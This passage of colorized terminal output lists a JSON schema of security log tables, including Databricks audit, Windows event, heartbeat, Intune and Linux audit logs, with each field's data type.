\u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksSQLPermissions\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksSSH\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksSecrets\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksTables\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksWorkspace\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ETWEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ChannelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KeywordName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpcodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Pid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TaskName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Event\"\u001b[39;49;00m: {\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventCategory\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventLevel\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventLevelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventLog\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ParameterXml\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RenderedDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Source\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Heartbeat\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ComputerEnvironment\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ComputerIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsGatewayInstalled\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OSMajorVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OSMinorVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OSName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OSType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPCountry\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLatitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLongitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SCAgentChannel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Solutions\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VMUUID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Version\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"HuntingBookmark\"\u001b[39;49;00m: {\n        \u001b[94m\"BookmarkId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"BookmarkName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"BookmarkType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"EventTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"LastUpdatedTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Notes\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QueryResultRow\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QueryText\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SoftDeleted\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UpdatedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"IntuneAuditLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"IntuneOperationalLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Result\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"LinuxAuditLog\"\u001b[39;49;00m: {\n        \u001b[94m\"AuditID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ComputerEnvironment\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExternalAgentIp\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RawRecord\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SerialNumber\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceComputerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeUploaded\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a0\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a3\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a4\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a5\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a6\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a7\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a8\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a9\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"acct\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"addr\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"arch\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"argc\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"audit_user\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"auid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"cmd\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"comm\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"cwd\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"data\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"effective_group\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"effective_user\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"egid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"euid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"exe\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"exit\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"family\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"filetype\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"gid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"group\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"hostname\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"icmptype\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"key\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"name\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"node\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"op\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"path\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"pid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"ppid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"res\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"result\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ses\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"success\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"syscall\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"terminal\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"tty\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"uid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"user\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"vm\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"McasShadowItReporting\"\u001b[39;49;00m: {\n        \u001b[94m\"AppCategory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppInstance\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppScore\"\u001b[39;49;00m: 